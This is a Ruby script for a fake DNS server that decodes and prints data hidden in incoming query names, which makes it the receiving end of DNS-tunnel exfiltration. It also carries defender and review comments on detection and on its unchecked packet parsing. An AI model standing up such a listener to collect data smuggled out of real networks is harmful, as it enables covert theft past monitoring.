#!/usr/bin/ruby
#
# pass a domain (minus the TLD) on the command line to strip it from the printed output
#
require 'socket'
# Minimal fake DNS responder that records the data carried in query names.
#
# Listens on a UDP port and, for every datagram received:
#   * walks the QNAME labels starting at byte 12 (just past the DNS header),
#   * answers with a canned A record (1.1.1.1, TTL 60) built by #response,
#   * prints the labels joined together, minus the last one, optionally with
#     the command-line supplied string removed.
#
# Defender's note: to a resolver log, traffic aimed at a listener like this
# shows up as many distinct, long, multi-label names that all resolve to the
# same address; query-name length and label-entropy monitoring is where such
# activity is normally spotted.
class UDPServer
  # @param port [Integer] UDP port to bind (53 normally needs elevated privileges)
  def initialize(port)
    @port = port
  end

  # Receive loop; never returns. Each datagram is parsed as a DNS query and
  # answered immediately. There is no error handling, so a packet that does
  # not fit the expected layout raises out of the loop and ends the server.
  def start
    @socket = UDPSocket.new
    @socket.bind('', @port) # '' binds every local interface
    loop do
      data, sender = @socket.recvfrom(1024)
      # QNAME starts right after the 12-byte header: a length byte followed by
      # that many label bytes, repeated until a zero length byte.
      offset = 12
      label_len = data[offset].ord
      domain = ""
      until label_len.zero?
        domain += data[offset + 1, label_len] + "."
        offset += label_len + 1
        # NOTE(review): label_len and offset come straight from the packet with
        # no bounds check against data.bytesize; a truncated name makes
        # data[offset] nil and the next line raises NoMethodError.
        label_len = data[offset].ord
      end
      # sender is the addrinfo array from recvfrom: index 1 is the port, index 3 the IP
      @socket.send(response(data), 0, sender[3], sender[1])
      # Print the carried labels; the final label (the TLD) is dropped.
      carried = domain.split(".")[0..-2].join
      if ARGV[0].nil?
        puts carried
      else
        # NOTE(review): ARGV[0] is interpolated into the regex unescaped, so any
        # metacharacters in it are interpreted rather than matched literally.
        puts carried.sub(/#{ARGV[0]}/, '')
      end
    end
  end

  # Build the answer for one query datagram: echoes the transaction ID and the
  # question section, sets the flags to 0x8100 (response bit set, RD set,
  # RCODE 0), and appends a single A record whose name is a compression
  # pointer back to the question name at offset 12.
  #
  # NOTE(review): the \x escapes make these literals UTF-8 strings in a UTF-8
  # source file, while recvfrom hands back ASCII-8BIT data; combining the two
  # when data holds bytes >= 0x80 can raise Encoding::CompatibilityError on
  # modern Rubies — confirm on the target interpreter.
  #
  # @param data [String] raw query datagram as received from the socket
  # @return [String] raw response datagram
  def response(data)
    # Header: ID, flags 0x8100, QDCOUNT repeated as ANCOUNT, NSCOUNT = ARCOUNT = 0.
    packet = "#{data[0,2]}\x81\x00#{data[4,2] * 2}\x00\x00\x00\x00"
    # Question section copied verbatim from the query.
    packet += data[12..-1]
    # Answer RR: name pointer 0xc00c (offset 12), TYPE A (1), CLASS IN (1), TTL 60 s.
    packet += "\xc0\x0c\x00\x01\x00\x01"
    packet += [60].pack("N")
    # RDATA: the fixed address 1.1.1.1 as four octets, preceded by its 16-bit length.
    address = "1.1.1.1".split('.').map(&:to_i).pack("C*")
    packet += [address.length].pack("n")
    packet += address
  end
end
# Entry point: bind the standard DNS port and serve until interrupted.
listener = UDPServer.new(53)
listener.start